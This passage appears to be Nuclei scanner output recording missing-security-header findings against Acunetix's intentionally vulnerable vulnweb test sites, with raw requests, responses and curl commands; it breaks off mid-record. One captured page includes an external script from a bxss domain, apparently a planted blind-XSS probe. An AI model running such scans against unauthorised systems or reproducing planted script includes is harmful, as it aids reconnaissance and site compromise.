style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:24.795610516Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:25.529532766Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:25.825605023Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:26.165508758Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:27.67819344Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 